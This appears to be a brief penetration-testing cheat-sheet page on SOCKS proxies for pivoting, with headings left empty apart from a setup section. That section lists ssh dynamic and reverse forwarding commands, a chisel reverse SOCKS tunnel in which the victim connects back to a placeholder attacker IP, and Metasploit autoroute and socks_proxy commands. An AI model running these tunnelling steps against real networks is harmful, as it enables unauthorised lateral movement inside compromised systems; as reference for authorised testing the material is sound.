🛠️SOCKS proxy
Theory
Practice
Basic server setup
ssh -N -D $PORT $CONTROLLED_TARGETssh -N -R $PORT $CONTROLLED_TARGET# attacker
chisel server --reverse --socks5 -p $PORT
# victim
chisel client $ATTACKER_MACHINE_IP:$ATTACKER_MACHINE_PORT R:socksmeterpreter > run autoroute -s 10.11.1.0/24msf > use auxiliary/server/socks_proxy
msf > set SRVPORT $PORT
msf > set VERSION 4a
msf > runBasic client usage
Chaining proxies




Last updated
Was this helpful?